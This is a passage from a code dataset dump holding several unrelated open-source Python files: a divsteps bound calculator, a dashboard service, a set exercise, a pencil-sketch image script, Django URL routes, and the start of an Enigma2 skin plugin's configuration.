divsteps^{n-1}(1-delta,g,(g-f)/2)\n n = new_state.setdefault(INC - delta, [[], 0])\n n[0].extend((g << 1, g - f) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n else:\n # divsteps^n(delta,f,g) = divsteps^{n-1}(1+delta,f,(f+g)/2)\n n = new_state.setdefault(INC + delta, [[], 0])\n n[0].extend((f << 1, g + f) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n\n # Even g:\n # divsteps^n(delta,f,g) = divsteps^{n-1}(1+delta,f,g/2)\n n = new_state.setdefault(INC + delta, [[], 0])\n n[0].extend((f << 1, g) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n\n for delta in new_state:\n # Minimize the set of points by computing a new convex hull over them.\n new_state[delta][0] = convex_hull(new_state[delta][0])\n # Update abs_g values for every hull.\n new_state[delta][1] = min(new_state[delta][1], max(abs(g) for _, g in new_state[delta][0]))\n\n return new_state\n\n\nparser = argparse.ArgumentParser(description=\"Compute the largest modulus for every number of divsteps.\")\nparser.add_argument('--half-delta', '-d', action='store_true', default=False, help=\"Use half-delta divsteps rule\")\nargs = parser.parse_args()\nif args.half_delta:\n INC=2\n\n# Define the initial state: a single hull for delta=1, defining the triangle f=0..1 g=0..f.\nSTEP = 0\nSTATE = {1: [[(0, 0), (1, 0), (1, 1)], 1]}\nwhile True:\n # Compute next state.\n STATE = process_divstep(STATE)\n STEP += 1\n # Compute the maximum of all abs_g values over all hulls at the current state.\n # For any input f,g, and any valid sequence of divsteps applied to it, abs(g)\n # must at some point have been less than or equal to that value (divided by 2**STEP).\n max_abs_g = max(abs_g for _, abs_g in STATE.values())\n # Thus, if the input triangle would have been alpha=(2**STEP / abs_g)-epsilon times\n # larger, abs(g) would at some point have been < 1. In the actual algorithm, g is an\n # integer, and thus abs(g)<1 implies g=0, which means the computation would have\n # been complete for any input.\n alpha = ((1 << STEP) - 1) // max_abs_g\n # That scaled triangle is f=0..alpha g=0..f, covering all moduli up alpha, and all\n # inputs up to the modulus.\n print(\"%i 0x%x (2**%f)\" % (STEP, alpha, math.log(alpha, 2)))\n","repo_name":"sipa/safegcd-bounds","sub_path":"hull_bound.py","file_name":"hull_bound.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"32837344676","text":"from app.service.dictionary_service import DictionaryService\nfrom app.service.practice_service import PracticeService\nfrom app.service.search_service import SearchService\nfrom app.service.word_service import WordService\n\n\nclass DashboardService:\n def __init__(self):\n self.dictionary_service = DictionaryService()\n self.word_service = WordService()\n self.search_service = SearchService()\n self.practice_service = PracticeService()\n\n def get_dashboard_metric(self, user_id):\n response = {}\n response['total_word'] = self.dictionary_service.get_count_by_specific_columns(user_id=user_id)\n response['search_count'] = self.search_service.get_count_by_specific_columns(user_id=user_id)\n response['total_practice'] = self.practice_service.get_count_by_specific_columns(user_id=user_id)\n response['success_ratio'] = ''\n all_practice = self.practice_service.get_all_by_specific_column(user_id=user_id)\n success_count = 0\n fail_count = 0\n for practice in all_practice:\n if practice.is_success:\n success_count += 1\n else:\n fail_count += 1\n\n print(success_count, \" \", fail_count)\n if (success_count + fail_count) != 0:\n response['success_ratio'] = int((success_count / (success_count + fail_count)) * 100)\n\n return response\n","repo_name":"aliereno/personal-dictionary","sub_path":"app/service/dashboard_service.py","file_name":"dashboard_service.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23549016705","text":"from io import StringIO\nimport sys\n\ninput1 = \"\"\"4\nPesho\nStefan\nStamat\nGosho\"\"\"\ninput2 = \"\"\"6\nPreslav\nGosho\nIvan\nStamat\nPesho\nStefan\"\"\"\n\n# sys.stdin = StringIO(input1)\nsys.stdin = StringIO(input2)\n\nnumber = int(input())\nodd_set = set()\neven_set = set()\n\nfor row in range(1, number + 1):\n name = input()\n result = int((sum(ord(ch) for ch in name)) / row)\n if result % 2 == 0:\n even_set.add(result)\n else:\n odd_set.add(result)\n\nif sum(odd_set) == sum(even_set):\n final = odd_set.union(even_set)\nelif sum(odd_set) > sum(even_set):\n final = odd_set.difference(even_set)\nelse:\n final = odd_set.symmetric_difference(even_set)\n\nprint(\", \".join(str(el) for el in final))\n","repo_name":"NPencheva/Python_Advanced","sub_path":"02_tuples_and_sets/02_tuples_and_sets_exercises/06_battle_of_names.py","file_name":"06_battle_of_names.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19929920362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 19:04:47 2018\n\n@author: debja\n\"\"\"\n\nimport imageio\n\nimg = r\"C:\\Users\\debja\\Desktop\\test_pic.jpg\"\nstart_img = imageio.imread(img)\n\n#interpret image shape\nstart_img.shape\n\n#applying greyscale\nimport numpy as np\ndef grayscale(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\ngray_img = grayscale(start_img)\n\n#inverted image\ninverted_img = 255-gray_img\n\n#blur the inverted image\nimport scipy.ndimage\nblur_img = scipy.ndimage.filters.gaussian_filter(inverted_img,sigma=20)\n#play with sigma for clearer results!\n\n#dodge and merge\n#divides the bottom layer by the inverted top layer\ndef dodge(front,back):\n result=front*255/(255-back) \n result[result>255]=255\n result[back==255]=255\n return result.astype('uint8')\nfinal_img= dodge(blur_img,gray_img)\n\n#result plot\nimport matplotlib.pyplot as plt\nplt.imshow(final_img, cmap=\"gray\")\n\n#save\nplt.imsave('img3.png', final_img, cmap='gray', vmin=0, vmax=255)","repo_name":"ahelii16/Pencil-Sketch","sub_path":"PencilSketch.py","file_name":"PencilSketch.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35563646163","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('',views.mainpage,name='mainpage'),\n path('addtable',views.addtable,name='addtable'),\n path('showpage',views.showpage,name='showpage'),\n path('editpage/',views.editpage,name='editpage'),\n path('update/',views.update,name='update'),\n path('delete/',views.delete,name='delete'),\n\n]\n","repo_name":"minu21shahabas/Image-Project","sub_path":"imgapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75170964906","text":"# -*- coding: utf-8 -*-\n\n# Kraven Plugin\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n# Thankfully inspired by MyMetrix by iMaxxx\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom .ColorSelection import KravenHDColorSelection\nfrom Screens.Screen import Screen\nfrom Screens.MessageBox import MessageBox\nfrom Screens.ChoiceBox import ChoiceBox\nfrom Screens.Standby import TryQuitMainloop\nfrom Screens.VirtualKeyBoard import VirtualKeyBoard\nfrom Components.ActionMap import ActionMap\nfrom Components.AVSwitch import AVSwitch\nfrom copy import deepcopy\nfrom Components.config import config, configfile, getConfigListEntry, ConfigYesNo, ConfigSubsection, ConfigSelection, ConfigText, ConfigClock, ConfigSlider\nfrom Components.ConfigList import ConfigListScreen\nfrom Components.Sources.StaticText import StaticText\nfrom Components.Label import Label\nfrom Components.Language import language\nfrom os import environ, listdir, system, popen, path\nfrom shutil import move\nfrom Components.Pixmap import Pixmap\nfrom Components.Label import Label\nfrom Components.Sources.CanvasSource import CanvasSource\nfrom Components.SystemInfo import SystemInfo\nfrom PIL import Image, ImageFilter, ImageDraw\nimport gettext, time, subprocess, requests\nfrom enigma import ePicLoad, getDesktop, eConsoleAppContainer, eTimer\nfrom Tools.Directories import fileExists, resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS\nfrom lxml import etree\nfrom xml.etree.cElementTree import fromstring\n\nfrom six.moves import range\n\n\nDESKTOP_WIDTH = getDesktop(0).size().width()\n\nlang = language.getLanguage()\nenviron[\"LANGUAGE\"] = lang[:2]\ngettext.bindtextdomain(\"enigma2\", resolveFilename(SCOPE_LANGUAGE))\ngettext.textdomain(\"enigma2\")\ngettext.bindtextdomain(\"KravenHD\", \"%s%s\" % (resolveFilename(SCOPE_PLUGINS), \"Extensions/KravenHD/locale/\"))\n\ndef _(txt):\n\tt = gettext.dgettext(\"KravenHD\", txt)\n\tif t == txt:\n\t\tt = gettext.gettext(txt)\n\treturn t\n\ndef translateBlock(block):\n\tfor x in TranslationHelper:\n\t\tif block.__contains__(x[0]):\n\t\t\tblock = block.replace(x[0], x[1])\n\treturn block\n\nColorSelfList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"C3461B\", _(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"ffffff\", _(\"white\")),\n\t(\"self\", _(\"self\"))\n\t]\n\nBackgroundList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"665700\", _(\"amber very dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"03001E\", _(\"blue very dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"180B00\", _(\"brown very dark\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"000E2B\", _(\"cobalt very dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"01263D\", _(\"cyan very dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"1C1C1C\", _(\"grey very dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"001203\", _(\"green very dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"1D130B\", _(\"Kraven very dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"161C12\", _(\"olive very dark\")),\n\t(\"C3461B\", _(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"521D00\", _(\"orange very dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"2F0029\", _(\"pink very dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"240004\", _(\"red very dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"131619\", _(\"steel very dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"11001E\", _(\"violet very dark\")),\n\t(\"ffffff\", _(\"white\"))\n\t]\n\nTextureList = []\n\nfor i in range(1, 50):\n\tn=str(i)\n\tif fileExists(\"/usr/share/enigma2/Kraven-user-icons/usertexture\"+n+\".png\") or fileExists(\"/usr/share/enigma2/Kraven-user-icons/usertexture\"+n+\".jpg\"):\n\t\tTextureList.append((\"usertexture\"+n, _(\"user texture\")+\" \"+n))\nfor i in range(1, 50):\n\tn=str(i)\n\tif fileExists(\"/usr/share/enigma2/KravenHD/textures/texture\"+n+\".png\") or fileExists(\"/usr/share/enigma2/KravenHD/textures/texture\"+n+\".jpg\"):\n\t\tTextureList.append((\"texture\"+n, _(\"texture\")+\" \"+n))\n\nBorderSelfList = deepcopy(ColorSelfList)\nBorderSelfList.append((\"none\", _(\"off\")))\n\nBackgroundSelfList = deepcopy(BackgroundList)\nBackgroundSelfList.append((\"self\", _(\"self\")))\n\nBackgroundSelfGradientList = deepcopy(BackgroundSelfList)\nBackgroundSelfGradientList.append((\"gradient\", _(\"gradient\")))\n\nBackgroundSelfTextureList = deepcopy(BackgroundSelfList)\nBackgroundSelfTextureList.append((\"texture\", _(\"texture\")))\n\nBackgroundSelfGradientTextureList = deepcopy(BackgroundSelfGradientList)\nBackgroundSelfGradientTextureList.append((\"texture\", _(\"texture\")))\n\nTransList = [\n\t(\"00\", \"0%\"),\n\t(\"0C\", \"5%\"),\n\t(\"18\", \"10%\"),\n\t(\"32\", \"20%\"),\n\t(\"58\", \"35%\"),\n\t(\"7E\", \"50%\")\n\t]\n\nProgressList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"progress\", _(\"colorfull\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"C3461B\", _(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"ffffff\", _(\"white\")),\n\t(\"self\", _(\"self\"))\n\t]\n\nconfig.plugins.KravenHD = ConfigSubsection()\nconfig.plugins.KravenHD.Primetime = ConfigClock(default=time.mktime((0, 0, 0, 20, 15, 0, 0, 0, 0)))\nconfig.plugins.KravenHD.InfobarAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.ECMLineAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.ScreensAntialias = ConfigSlider(default=10, increment=1, limits=(0, 20))\nconfig.plugins.KravenHD.SelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.SelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.SelfColorB = ConfigSlider(default=75, increment=5, limits=(0, 255))\n\nconfig.plugins.KravenHD.customProfile = ConfigSelection(default=\"1\", choices = [\n\t\t\t\t(\"1\", _(\"1\")),\n\t\t\t\t(\"2\", _(\"2\")),\n\t\t\t\t(\"3\", _(\"3\")),\n\t\t\t\t(\"4\", _(\"4\")),\n\t\t\t\t(\"5\", _(\"5\"))\n\t\t\t\t])\n\nprofList = [(\"default\", _(\"0 (hardcoded)\"))]\nfor i in range(1, 21):\n\tn = name = str(i)\n\tif fileExists(\"/etc/enigma2/kravenhd_default_\" + n):\n\t\tif i == 1:\n\t\t\tname = '1 ' + _(\"MiniTV\")\n\t\telif i == 2:\n\t\t\tname = '2 ' + _(\"dark\")\n\t\telif i == 3:\n\t\t\tname = '3 ' + _(\"light\")\n\t\telif i == 4:\n\t\t\tname = '4 ' + _(\"colored\")\n\t\tprofList.append((n, _(name)))\nconfig.plugins.KravenHD.defaultProfile = ConfigSelection(default=\"default\", choices = profList)\n\t\t\t\t\nconfig.plugins.KravenHD.refreshInterval = ConfigSelection(default=\"60\", choices = [\n\t\t\t\t(\"15\", _(\"15\")),\n\t\t\t\t(\"30\", _(\"30\")),\n\t\t\t\t(\"60\", _(\"60\")),\n\t\t\t\t(\"120\", _(\"120\")),\n\t\t\t\t(\"240\", _(\"240\")),\n\t\t\t\t(\"480\", _(\"480\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.Volume = ConfigSelection(default=\"volume-border\", choices = [\n\t\t\t\t(\"volume-original\", _(\"original\")),\n\t\t\t\t(\"volume-border\", _(\"with Border\")),\n\t\t\t\t(\"volume-left\", _(\"left\")),\n\t\t\t\t(\"volume-right\", _(\"right\")),\n\t\t\t\t(\"volume-top\", _(\"top\")),\n\t\t\t\t(\"volume-center\", _(\"center\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.BackgroundColorTrans = ConfigSelection(default=\"32\", choices = TransList)\n\nconfig.plugins.KravenHD.InfobarColorTrans = ConfigSelection(default=\"00\", choices = TransList)\n\nconfig.plugins.KravenHD.BackgroundListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfGradientTextureList)\nconfig.plugins.KravenHD.BackgroundSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundAlternateListColor = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundAlternateSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundAlternateColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfTextureList)\nconfig.plugins.KravenHD.InfobarGradientSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarBoxListColor = ConfigSelection(default=\"self\", choices = BackgroundSelfGradientTextureList)\nconfig.plugins.KravenHD.InfobarBoxSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarBoxColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarAlternateListColor = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarAlternateSelfColor = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarAlternateColor = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundGradientListColorPrimary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundGradientSelfColorPrimary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundGradientColorPrimary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BackgroundGradientListColorSecondary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.BackgroundGradientSelfColorSecondary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.BackgroundGradientColorSecondary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColorPrimary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarGradientSelfColorPrimary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColorPrimary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.InfobarGradientListColorSecondary = ConfigSelection(default=\"000000\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.InfobarGradientSelfColorSecondary = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.InfobarGradientColorSecondary = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.Font1List = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Font1Self = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Font1 = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.Font2List = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.Font2Self = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.Font2 = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.IBFont1List = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBFont1Self = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBFont1 = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBFont2List = ConfigSelection(default=\"F0A30A\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBFont2Self = ConfigText(default=\"F0A30A\")\nconfig.plugins.KravenHD.IBFont2 = ConfigText(default=\"F0A30A\")\n\nconfig.plugins.KravenHD.PermanentClockFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.PermanentClockFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.PermanentClockFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.SelectionFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.SelectionFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.SelectionFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MarkedFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MarkedFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.MarkedFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ECMFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ECMFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ECMFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ChannelnameFontList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ChannelnameFontSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ChannelnameFont = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.PrimetimeFontList = ConfigSelection(default=\"70AD11\", choices = ColorSelfList)\nconfig.plugins.KravenHD.PrimetimeFontSelf = ConfigText(default=\"70AD11\")\nconfig.plugins.KravenHD.PrimetimeFont = ConfigText(default=\"70AD11\")\n\nconfig.plugins.KravenHD.ButtonTextList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.ButtonTextSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.ButtonText = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.AndroidList = ConfigSelection(default=\"000000\", choices = ColorSelfList)\nconfig.plugins.KravenHD.AndroidSelf = ConfigText(default=\"000000\")\nconfig.plugins.KravenHD.Android = ConfigText(default=\"000000\")\n\nconfig.plugins.KravenHD.BorderList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.BorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Border = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.ProgressList = ConfigSelection(default=\"C3461B\", choices = ProgressList)\nconfig.plugins.KravenHD.ProgressSelf = ConfigText(default=\"C3461B\")\nconfig.plugins.KravenHD.Progress = ConfigText(default=\"C3461B\")\n\nconfig.plugins.KravenHD.LineList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.LineSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.Line = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBLineList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBLineSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBLine = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBStyle = ConfigSelection(default=\"grad\", choices = [\n\t\t\t\t(\"grad\", _(\"gradient\")),\n\t\t\t\t(\"box\", _(\"box\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfoStyle = ConfigSelection(default=\"gradient\", choices = [\n\t\t\t\t(\"gradient\", _(\"gradient\")),\n\t\t\t\t(\"primary\", _(\" Primary Color\")),\n\t\t\t\t(\"secondary\", _(\" Secondary Color\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarTexture = ConfigSelection(default=\"texture1\", choices = TextureList)\n\t\t\t\t\nconfig.plugins.KravenHD.BackgroundTexture = ConfigSelection(default=\"texture1\", choices = TextureList)\n\nconfig.plugins.KravenHD.SelectionStyle = ConfigSelection(default=\"color\", choices = [\n\t\t\t\t(\"color\", _(\"solid color\")),\n\t\t\t\t(\"pixmap\", _(\"two-colored\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SelectionBackgroundList = ConfigSelection(default=\"0050EF\", choices = ColorSelfList)\nconfig.plugins.KravenHD.SelectionBackgroundSelf = ConfigText(default=\"0050EF\")\nconfig.plugins.KravenHD.SelectionBackground = ConfigText(default=\"0050EF\")\n\nconfig.plugins.KravenHD.SelectionBackground2List = ConfigSelection(default=\"001F59\", choices = BackgroundSelfList)\nconfig.plugins.KravenHD.SelectionBackground2Self = ConfigText(default=\"001F59\")\nconfig.plugins.KravenHD.SelectionBackground2 = ConfigText(default=\"001F59\")\n\nconfig.plugins.KravenHD.SelectionBorderList = ConfigSelection(default=\"ffffff\", choices = BorderSelfList)\nconfig.plugins.KravenHD.SelectionBorderSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.SelectionBorder = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.MiniTVBorderList = ConfigSelection(default=\"3F3F3F\", choices = ColorSelfList)\nconfig.plugins.KravenHD.MiniTVBorderSelf = ConfigText(default=\"3F3F3F\")\nconfig.plugins.KravenHD.MiniTVBorder = ConfigText(default=\"3F3F3F\")\n\nconfig.plugins.KravenHD.AnalogColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.AnalogColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.AnalogColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.InfobarStyle = ConfigSelection(default=\"infobar-style-x3\", choices = [\n\t\t\t\t(\"infobar-style-nopicon\", _(\"no Picon\")),\n\t\t\t\t(\"infobar-style-x1\", _(\"X1\")),\n\t\t\t\t(\"infobar-style-x2\", _(\"X2\")),\n\t\t\t\t(\"infobar-style-x3\", _(\"X3\")),\n\t\t\t\t(\"infobar-style-z1\", _(\"Z1\")),\n\t\t\t\t(\"infobar-style-z2\", _(\"Z2\")),\n\t\t\t\t(\"infobar-style-zz1\", _(\"ZZ1\")),\n\t\t\t\t(\"infobar-style-zz2\", _(\"ZZ2\")),\n\t\t\t\t(\"infobar-style-zz3\", _(\"ZZ3\")),\n\t\t\t\t(\"infobar-style-zzz1\", _(\"ZZZ1\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarChannelName = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"infobar-channelname-small\", _(\"Name small\")),\n\t\t\t\t(\"infobar-channelname-number-small\", _(\"Name & Number small\")),\n\t\t\t\t(\"infobar-channelname\", _(\"Name big\")),\n\t\t\t\t(\"infobar-channelname-number\", _(\"Name & Number big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.InfobarChannelName2 = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"infobar-channelname-small\", _(\"Name\")),\n\t\t\t\t(\"infobar-channelname-number-small\", _(\"Name & Number\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBFontSize = ConfigSelection(default=\"big\", choices = [\n\t\t\t\t(\"small\", _(\"small\")),\n\t\t\t\t(\"middle\", _(\"middle\")),\n\t\t\t\t(\"big\", _(\"big\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.TypeWriter = ConfigSelection(default=\"runningtext\", choices = [\n\t\t\t\t(\"typewriter\", _(\"typewriter\")),\n\t\t\t\t(\"runningtext\", 